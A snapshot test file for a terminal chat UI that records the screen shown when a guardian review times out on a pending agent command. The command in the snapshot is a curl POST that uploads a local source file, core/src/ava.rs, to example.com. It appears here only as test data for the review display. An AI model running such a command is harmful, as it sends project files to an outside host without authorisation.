ava-rs/tui/src/chatwidget/snapshots/ava_tui__chatwidget__tests__app_server_guardian_review_timed_out_renders_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---







✗ Review timed out before ava could run curl -sS -i -X POST --data-binary
  @core/src/ava.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Ava to do anything

  GPT-5.6-Sol default · /tmp/project
